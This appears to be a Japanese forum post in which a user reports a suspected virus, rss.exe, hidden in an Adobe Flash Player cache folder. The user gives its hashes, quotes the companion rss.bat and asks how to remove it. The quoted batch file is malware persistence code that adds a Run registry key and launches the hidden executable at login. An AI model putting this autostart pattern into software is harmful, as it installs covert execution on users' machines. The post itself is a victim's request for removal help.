情報有り難うございます
CRC32: 73144CAA
MD5: A8F9C90F60DFF086CAB4C336E03B3BDC
SHA-1: 75FE3E93EB90F7FF23718C25B602AACA9506794C
サイズ: 189,440 バイト
場所: %AppData%\Roaming\Adobe\Flash Player\File Cache\rss.exe
と多少異なってはいますが 同種のウイルスでしょうか?
尚 同ディレクトリ"File Cache"に rss.bat が有り、以下の内容が記述されています。
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v RSS /d "wscript "%appdata%\Adobe\Flash Player\File Cache\file.vbs" "%appdata%\Adobe\Flash Player\File Cache\rss.bat"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\File Cache\rss.exe"
私には全く理解出来ませんが、完全に削除するにはどうすれば良いのでしょうか?
又 ディレクトリ"File Cache"は以下のように構成されています
File Cache
┣file.vbs
┣libcurl-4.dll
┣pthreadGC2.dll
┣rss.bat
┗rss.exe
必要でしたら 各ファイルを Base64 でEnCode して開示する事も可能です。
対処法・完全削除法をご教示下さい。